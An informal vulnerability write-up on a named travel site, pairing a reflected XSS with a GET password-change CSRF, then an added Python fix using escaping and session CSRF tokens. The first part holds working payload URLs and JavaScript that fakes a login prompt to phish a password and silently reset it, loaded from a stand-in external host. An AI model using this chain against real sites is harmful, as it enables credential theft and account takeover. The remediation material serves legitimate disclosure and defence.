I remember using this in an interview, but the interviewer thought it was not feasible. I think it is feasible for users to be caught by X.
1. Some XSS: http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt>prompt(/xss/)</ScRiPt>&todo=index

2. Change-password CSRF: http://www.tuniu.com/main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1

3. Create an external JS file:

    var pass;
    pass = prompt("Login timeout, please enter your password again", "password");
    url = "http://www.tuniu.com/main.php?do=user_do_change_password&new=password&pwd_s=1&old=" + pass;
    window.location = url;

4. Entice users to visit http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt/src=//www.your-site.com/1.js></ScRiPt>&todo=index. If the user enters the correct password, the JS performs the CSRF and resets their password.
The endpoint returns 1 when the reset succeeds and 0 when it fails. This can also be combined with XSS filter bypasses. A separate pop-up window could be used instead of prompt() so that the user enters the password masked with *. Could the location jump be replaced with a silent request?
Solution: fix the XSS and the CSRF...
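The fix for both defects, as an added example that is not part of the original report or of the site's own code: the reflected pdate value is HTML-encoded before it is rendered, and the password-change endpoint only accepts a POST carrying a per-session CSRF token and the verified current password, still replying 1/0 as the report describes. The in-memory user and session stores, the salt and the PBKDF2 parameters are constructed stand-ins for a real backend.

```python
import hmac
import html
import secrets
from hashlib import pbkdf2_hmac

SALT = b"constructed-salt"          # constructed; a real store uses a per-user salt


def hash_password(pw: str) -> bytes:
    return pbkdf2_hmac("sha256", pw.encode(), SALT, 100_000)


USERS = {"alice": hash_password("123456")}   # constructed user, same old password as the report
SESSIONS = {}                                # session id -> {"user": ..., "csrf": ...}


def new_session(user: str) -> str:
    """Log a user in: fresh session id plus a CSRF token bound to that session."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token(sid: str) -> str:
    """Token the page embeds in its own change-password form (never in a cookie alone)."""
    return SESSIONS[sid]["csrf"]


def render_route_page(pdate: str) -> str:
    """Hardened reflection of the pdate parameter: tags and quotes become text."""
    return "<p>date: " + html.escape(pdate, quote=True) + "</p>"


def change_password(method: str, sid: str, params: dict) -> int:
    """Returns 1 on success and 0 on failure, mirroring the endpoint's 1/0 reply."""
    sess = SESSIONS.get(sid)
    if method != "POST" or sess is None:          # a GET navigation like window.location can no longer change anything
        return 0
    if not hmac.compare_digest(params.get("csrf_token", ""), sess["csrf"]):
        return 0                                   # cross-site form posts lack the session-bound token
    stored = USERS[sess["user"]]
    if not hmac.compare_digest(hash_password(params.get("old", "")), stored):
        return 0                                   # current password still has to be right
    new = params.get("new", "")
    if len(new) < 8:
        return 0                                   # constructed minimum policy; adjust to the site's rules
    USERS[sess["user"]] = hash_password(new)
    return 1
```

The CSRF token only helps once the reflected XSS is gone: script running in the site's own origin could read the token from the page, which is why both fixes are needed together.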